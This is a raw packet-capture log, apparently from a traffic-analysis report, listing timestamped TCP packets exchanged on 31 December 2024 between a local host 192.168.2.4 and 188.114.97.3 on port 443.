                                                                                              Dec 31, 2024 08:57:13.192179918 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.194263935 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.194348097 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.197808027 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.197917938 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.197983027 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.198138952 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.201188087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.201267004 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.203408957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.218615055 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.218849897 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.218856096 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.218997002 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.219849110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.219954967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.222209930 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.222455025 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.230530977 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.230696917 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.247740984 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.247833967 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.247860909 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.247863054 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.247870922 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.247884035 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.247925997 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248064041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248126984 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248157978 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248161077 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248219013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248260021 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248294115 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248342037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248354912 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248358965 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248392105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.248394966 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248394966 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248455048 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248455048 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.248461008 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.254754066 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.254858971 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.254864931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.262646914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.262777090 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.262782097 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.263999939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.264414072 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.264425039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.264645100 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.272140026 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.272192001 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.272229910 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.272234917 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.272527933 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.276886940 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.277812958 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.282138109 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.282354116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.282366991 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.282552004 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.282798052 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.282959938 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.282965899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.283083916 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.283660889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.283705950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.283747911 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.283754110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.283873081 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.284286022 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.284351110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.284416914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.284471989 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.285206079 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.285284042 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.285830021 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.285862923 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.285890102 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.285892963 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.285907030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.285933018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.285996914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.286000967 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.287853956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.287946939 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.287951946 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.290664911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.290791035 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.290796995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.294027090 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.294075012 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.294104099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.294118881 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.294125080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.294142008 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.294154882 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.320446968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.320523024 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.320528984 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.321997881 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.322096109 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.322102070 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.322721958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.322936058 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.322942019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.322984934 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.323024988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.323276043 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.323282957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.326832056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.326909065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.326953888 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.326987028 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.326992035 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.327020884 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.327713966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.327764988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.327792883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.327795982 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.327825069 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.327934027 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.327966928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.327971935 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.328031063 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.328068972 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.328104019 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.328109026 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.328162909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.328454018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.329601049 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.329652071 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.329679966 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.329687119 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.329835892 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.334271908 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.334393024 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.341259956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.341331005 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.341331005 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.349986076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.350038052 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.351075888 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.351106882 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.351150990 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.351155043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.351197004 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.351322889 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.351329088 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.351463079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.355484009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.355562925 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.355690002 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.355695009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.355863094 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.369971037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.370007038 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.370029926 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.370034933 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.370058060 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.370153904 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.370160103 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.370256901 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377278090 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377388954 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377393007 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377397060 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377466917 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377588987 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377667904 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377672911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377702951 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377747059 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377753973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.377867937 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.377901077 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378046036 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378191948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378257036 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378285885 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378318071 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378348112 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378350973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378365993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378518105 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378524065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378614902 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378628969 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378721952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378741980 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378746986 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378784895 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.378910065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.378974915 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.379034996 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.379039049 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.379076958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.379123926 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.379129887 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.379256010 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.380796909 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.380832911 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.380893946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.380897045 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.380984068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.380987883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.380991936 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.381097078 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.409473896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409524918 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409557104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.409562111 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409615040 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409646988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409674883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.409682035 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.409692049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.409753084 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.413480043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.413530111 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.413610935 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.413616896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.413696051 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.413712978 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.413728952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.413804054 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.413841009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414040089 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414117098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414118052 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.414124966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414175987 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.414300919 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414407015 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414446115 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.414449930 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414508104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.414647102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414701939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414726019 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.414731979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.414827108 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.421009064 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421040058 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421108961 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.421113014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421175003 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421192884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421211958 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.421216011 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.421235085 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.428033113 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.428169012 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.428174019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.428221941 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.428250074 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.428277016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.428281069 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.428316116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.428370953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.437848091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.437948942 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.437963963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.437968969 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.438040972 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.438087940 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.438231945 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.442276955 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.442352057 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.442368984 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.442375898 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.442696095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464045048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464104891 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464148045 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464253902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464273930 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464277029 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464306116 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464349031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464349031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464356899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464411020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464463949 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464471102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464579105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464709044 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464735031 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464740992 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.464780092 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.464960098 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465004921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465054035 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465056896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465069056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465143919 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465166092 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465173006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465262890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465425968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465478897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465542078 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465544939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465610027 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465615034 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465646029 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465677023 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465679884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465775967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465795994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465934992 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.465938091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.465945959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.466028929 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.500498056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.500514984 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.500606060 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.500617981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.500657082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.500754118 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.500754118 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.500758886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.500896931 CET44349735188.114.97.3192.168.2.4
